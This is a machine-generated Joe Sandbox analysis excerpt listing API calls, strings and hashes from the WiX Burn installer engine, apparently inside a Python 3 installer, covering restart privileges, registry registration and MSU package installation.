                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                  • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$c:\agent\_work\138\s\src\burn\engine\pseudobundle.cpp
                                                                                                                                  • API String ID: 1357844191-3972778097
                                                                                                                                  • Opcode ID: a214ae5889b9387bd7d3b4867d82bed25de968807ad6cbe28b0c02ab4d329235
                                                                                                                                  • Instruction ID: f6aebd8e230f12eba5938f9622f4bd844cb1f779111e014b6b7cb544595e2ab9
                                                                                                                                  • Opcode Fuzzy Hash: a214ae5889b9387bd7d3b4867d82bed25de968807ad6cbe28b0c02ab4d329235
                                                                                                                                  • Instruction Fuzzy Hash: 25C10271A40656EFDB959F6AC881B6A7694BF1A704F00851BFC15DB341D7B8EC008BEC
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 0048469D
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 004846A4
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 004846AE
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004846FE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00484708
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 0048474C
                                                                                                                                  • GetLastError.KERNEL32 ref: 00484756
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 00484792
                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 004847A3
                                                                                                                                  • GetLastError.KERNEL32 ref: 004847AD
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00484803
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                  • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$c:\agent\_work\138\s\src\burn\engine\engine.cpp
                                                                                                                                  • API String ID: 2241679041-3611283357
                                                                                                                                  • Opcode ID: d5d0b833da70caf15728175e4d18fc4b8b45d50d150187abc298dcc3995fef69
                                                                                                                                  • Instruction ID: e547a703fc2aa8fd0e15bbf06559d67f5ed2876c61a36a69f798d150c997b9ca
                                                                                                                                  • Opcode Fuzzy Hash: d5d0b833da70caf15728175e4d18fc4b8b45d50d150187abc298dcc3995fef69
                                                                                                                                  • Instruction Fuzzy Hash: 7C41D97A940326ABD7107BA54C4AF6F6558EB41755F11093BFE41B7240EB6C8D0047ED
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 004863A9
                                                                                                                                  • GetLastError.KERNEL32 ref: 004863B3
                                                                                                                                  Strings
                                                                                                                                  • Failed to get OS info., xrefs: 004863E1
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 004863D7
                                                                                                                                  • Failed to set variant value., xrefs: 004864D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastVersion
                                                                                                                                  • String ID: Failed to get OS info.$Failed to set variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 305913169-505467846
                                                                                                                                  • Opcode ID: 48e611c540096bc5d43006729ee043f255f8dec1c67137b64500763e19d92b8c
                                                                                                                                  • Instruction ID: f73bffacdaa21148e32d0353270764e69bf6a5a517f18c6c1d7dd4e89962687c
                                                                                                                                  • Opcode Fuzzy Hash: 48e611c540096bc5d43006729ee043f255f8dec1c67137b64500763e19d92b8c
                                                                                                                                  • Instruction Fuzzy Hash: 9341C771A00228A7DB60EB59DC45FEF7AB8DB45B10F11045BF505E7240DA389A41CB9C
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00499BD3
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00499BFA
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00499C5A
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00499C65
                                                                                                                                    • Part of subcall function 00483D89: GetFileAttributesW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 00483DE8
                                                                                                                                    • Part of subcall function 00483D89: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00483DFB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                  • String ID: *.*$.unverified
                                                                                                                                  • API String ID: 457978746-2528915496
                                                                                                                                  • Opcode ID: c0377aa9504a7ba8842c3d6da0234a5c64b1ea106e8b0ae75fbeba96d1c8ef39
                                                                                                                                  • Instruction ID: 5061e97ff636216546a79c9da54862b93f0ea8dc8e174cced669557f16891ea6
                                                                                                                                  • Opcode Fuzzy Hash: c0377aa9504a7ba8842c3d6da0234a5c64b1ea106e8b0ae75fbeba96d1c8ef39
                                                                                                                                  • Instruction Fuzzy Hash: C5415130900528AADF61AB65DD49BEE7BF8EF44305F5005BBE508A10A0EB799EC4DF5C
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 00486297
                                                                                                                                  • Failed to set variant value., xrefs: 004862BD
                                                                                                                                  • Failed to get the user name., xrefs: 004862A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 2054405381-589247725
                                                                                                                                  • Opcode ID: e7ad0bcccff5484c779f9a74ed6c0fe45a428196979cbacda489a436e677778b
                                                                                                                                  • Instruction ID: c100bc8cdedc78ef0a912b3bdc8be9b439f7f6c3ccb71967141e4a14c9bea71e
                                                                                                                                  • Opcode Fuzzy Hash: e7ad0bcccff5484c779f9a74ed6c0fe45a428196979cbacda489a436e677778b
                                                                                                                                  • Instruction Fuzzy Hash: 7A012636A0032467C750BB559C06FAF73A8AF10725F1101ABF818E7281DA6CED4447DC
                                                                                                                                  Strings
                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 0049A0B3
                                                                                                                                  • Failed to copy working folder., xrefs: 0049A0F1
                                                                                                                                  • 5TH, xrefs: 0049A09B
                                                                                                                                  • Failed create working folder., xrefs: 0049A0C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                  • String ID: 5TH$Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                  • API String ID: 3841436932-2231802820
                                                                                                                                  • Opcode ID: 953a574edba884a37fad0f89eb35838d3bad1efd79a040f0b09d943790a62e3b
                                                                                                                                  • Instruction ID: fe550f90d455236f3cdfd930118c37e0748e19270df8880252d19eb6fb6b3dd9
                                                                                                                                  • Opcode Fuzzy Hash: 953a574edba884a37fad0f89eb35838d3bad1efd79a040f0b09d943790a62e3b
                                                                                                                                  • Instruction Fuzzy Hash: 1D01DE32940265FB8F326F569D06C9F7E64EE80750B21816BF80076210DE388E60AAD9
                                                                                                                                  APIs
                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004A69AE,00000000,00000003), ref: 004A6A19
                                                                                                                                  • GetLastError.KERNEL32(?,004A69AE,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,004A6D9D,?), ref: 004A6A23
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\msuengine.cpp, xrefs: 004A6A47
                                                                                                                                  • Failed to set service start type., xrefs: 004A6A51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                  • String ID: Failed to set service start type.$c:\agent\_work\138\s\src\burn\engine\msuengine.cpp
                                                                                                                                  • API String ID: 1456623077-3939833892
                                                                                                                                  • Opcode ID: 6c449815b4de1f66489d40891f52f204faf97d5b293da0919094da2c6ae7bdf7
                                                                                                                                  • Instruction ID: f9a6d5e5f0277cded8cca074b7a2146599373a105554dd7a0413f40d09b9e94b
                                                                                                                                  • Opcode Fuzzy Hash: 6c449815b4de1f66489d40891f52f204faf97d5b293da0919094da2c6ae7bdf7
                                                                                                                                  • Instruction Fuzzy Hash: 00F0EC37A45235734621369A5C0AF8B7E48DF13B71B124327FE28B62D19A198D0082DC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9cc6b2dd824b08b2f17b87951fe2886d4bc0a590ba30c1ec50195a6cc8cb7c91
                                                                                                                                  • Instruction ID: 698492330a9b9f088ec6604b3815392dc0a2b60014dc8357f14887d4f1786366
                                                                                                                                  • Opcode Fuzzy Hash: 9cc6b2dd824b08b2f17b87951fe2886d4bc0a590ba30c1ec50195a6cc8cb7c91
                                                                                                                                  • Instruction Fuzzy Hash: 60E04632912228EBC725DB8D898499AF3ACEB49B10B11459FB904D3201C6749E01C7E4
                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00490618
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.14.0.5722$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor$crypt32.dll
                                                                                                                                  • API String ID: 3535843008-2557340968
                                                                                                                                  • Opcode ID: 67c59c11012073d745159e4b740ac4160a0ac6f57c3428a7119fa1401faffda1
                                                                                                                                  • Instruction ID: 0c55f3b9b12d49bb2b4ca4424349d97ae5611d694533ada504e6892cdc07f24f
                                                                                                                                  • Opcode Fuzzy Hash: 67c59c11012073d745159e4b740ac4160a0ac6f57c3428a7119fa1401faffda1
                                                                                                                                  • Instruction Fuzzy Hash: B4F1D131A40626FFCF229A508D22F6E7E65AB04764F110167FD00B6772D76DED60AACC
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,?,004ABFC1,?,?,?), ref: 00488583
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,004ABFC1,?,?,?,?,?,Chain), ref: 004888E6
                                                                                                                                  Strings
                                                                                                                                  • Type, xrefs: 0048867F
                                                                                                                                  • Initializing hidden variable '%ls', xrefs: 0048874D
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 0048889B
                                                                                                                                  • Failed to select variable nodes., xrefs: 004885A0
                                                                                                                                  • Hidden, xrefs: 0048860B
                                                                                                                                  • Invalid value for @Type: %ls, xrefs: 0048884D
                                                                                                                                  • Initializing version variable '%ls' to value '%ls', xrefs: 0048872F
                                                                                                                                  • Value, xrefs: 00488641
                                                                                                                                  • Failed to get @Id., xrefs: 004888D1
                                                                                                                                  • Initializing numeric variable '%ls' to value '%ls', xrefs: 004886BE
                                                                                                                                  • version, xrefs: 00488708
                                                                                                                                  • Failed to set variant value., xrefs: 00488867
                                                                                                                                  • Variable, xrefs: 0048858D
                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 00488889
                                                                                                                                  • Failed to get @Hidden., xrefs: 004888CA
                                                                                                                                  • Failed to get @Persisted., xrefs: 004888C3
                                                                                                                                  • numeric, xrefs: 00488698
                                                                                                                                  • string, xrefs: 004886D3
                                                                                                                                  • Failed to change variant type., xrefs: 004888BC
                                                                                                                                  • Failed to get @Value., xrefs: 0048886E
                                                                                                                                  • Failed to get @Type., xrefs: 00488860
                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 00488878
                                                                                                                                  • Failed to set variant encryption, xrefs: 0048887F
                                                                                                                                  • Persisted, xrefs: 00488626
                                                                                                                                  • Failed to get next node., xrefs: 004888D8
                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 004888B4
                                                                                                                                  • Initializing string variable '%ls' to value '%ls', xrefs: 004886F6
                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 004888AA
                                                                                                                                  • Failed to get variable node count., xrefs: 004885BD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$c:\agent\_work\138\s\src\burn\engine\variable.cpp$numeric$string$version
                                                                                                                                  • API String ID: 3168844106-1391453742
                                                                                                                                  • Opcode ID: f57edecb916a0a30528a412a44d52f74b40b0c0c8c576fedcdc5d586e63706e7
                                                                                                                                  • Instruction ID: 6f2a4233f909ef143c0f2c129cd7a96bc79ae784339085dee17db936bcca0f19
                                                                                                                                  • Opcode Fuzzy Hash: f57edecb916a0a30528a412a44d52f74b40b0c0c8c576fedcdc5d586e63706e7
                                                                                                                                  • Instruction Fuzzy Hash: E1B1DF76D00219FBCB11BB95CC85FAEBB75AF44710FA0052FF914B6291DB389E019B98
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0049BDA0,00000007,?,?,?), ref: 004A6B95
                                                                                                                                    • Part of subcall function 004C0F42: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00485F1B,00000000), ref: 004C0F57
                                                                                                                                    • Part of subcall function 004C0F42: GetProcAddress.KERNEL32(00000000), ref: 004C0F5E
                                                                                                                                    • Part of subcall function 004C0F42: GetLastError.KERNEL32(?,?,?,?,00485F1B,00000000), ref: 004C0F79
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 004A6F84
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 004A6F98
                                                                                                                                  Strings
                                                                                                                                  • Failed to determine WOW64 status., xrefs: 004A6BA7
                                                                                                                                  • Failed to get action arguments for MSU package., xrefs: 004A6C4B
                                                                                                                                  • Failed to append log switch to MSU command-line., xrefs: 004A6D2B
                                                                                                                                  • wusa.exe, xrefs: 004A6C15
                                                                                                                                  • Failed to append SysNative directory., xrefs: 004A6BF2
                                                                                                                                  • Failed to format MSU uninstall command., xrefs: 004A6CFE
                                                                                                                                  • SysNative\, xrefs: 004A6BDF
                                                                                                                                  • D, xrefs: 004A6DB0
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\msuengine.cpp, xrefs: 004A6E02, 004A6E97, 004A6EBF
                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 004A6C71
                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 004A6C80, 004A6FB0
                                                                                                                                  • Bootstrapper application aborted during MSU progress., xrefs: 004A6EC9
                                                                                                                                  • Failed to format MSU install command., xrefs: 004A6CD1
                                                                                                                                  • /log:, xrefs: 004A6D17
                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 004A6F13
                                                                                                                                  • Failed to ensure WU service was enabled to install MSU package., xrefs: 004A6DA3
                                                                                                                                  • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 004A6CEA
                                                                                                                                  • "%ls" "%ls" /quiet /norestart, xrefs: 004A6CBD
                                                                                                                                  • 2, xrefs: 004A6E28
                                                                                                                                  • Failed to allocate WUSA.exe path., xrefs: 004A6C28
                                                                                                                                  • Failed to append log path to MSU command-line., xrefs: 004A6D49
                                                                                                                                  • Failed to find System32 directory., xrefs: 004A6C0A
                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 004A6E0F
                                                                                                                                  • Failed to find Windows directory., xrefs: 004A6BD4
                                                                                                                                  • Failed to build MSU path., xrefs: 004A6CAA
                                                                                                                                  • Failed to get process exit code., xrefs: 004A6EA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$c:\agent\_work\138\s\src\burn\engine\msuengine.cpp$wusa.exe
                                                                                                                                  • API String ID: 1400713077-2496767321
                                                                                                                                  • Opcode ID: 82140806229a599e45b6eb131b1debf9e73d2ca0699dedafb0614ca0d39c345f
                                                                                                                                  • Instruction ID: 9dc1a1cfb065066dc4ceaaa6fbfbbea162a26dd98bef5d87d58b71a5ef3a2c0a
                                                                                                                                  • Opcode Fuzzy Hash: 82140806229a599e45b6eb131b1debf9e73d2ca0699dedafb0614ca0d39c345f
                                                                                                                                  • Instruction Fuzzy Hash: 1BD1B370A4031AAFDF11AFE5CC85FAFBAB8AF25704F15002BF600A2251D7BD9940DB59
                                                                                                                                  APIs
                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 004AD296
                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 004AD2BF
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 004AD3A8
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 004AD3B2
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 004AD44B
                                                                                                                                  • WaitForSingleObject.KERNEL32(004CB4F0,000000FF,?,?,?,?), ref: 004AD456
                                                                                                                                  • ReleaseMutex.KERNEL32(004CB4F0,?,?,?,?), ref: 004AD480
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 004AD4A1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 004AD4AF
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 004AD4E7
                                                                                                                                    • Part of subcall function 004AD129: WaitForSingleObject.KERNEL32(?,000000FF,771B30B0,00000000,?,?,?,004AD425,?), ref: 004AD148
                                                                                                                                    • Part of subcall function 004AD129: ReleaseMutex.KERNEL32(?,?,?,004AD425,?), ref: 004AD15C
                                                                                                                                    • Part of subcall function 004AD129: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004AD1A1
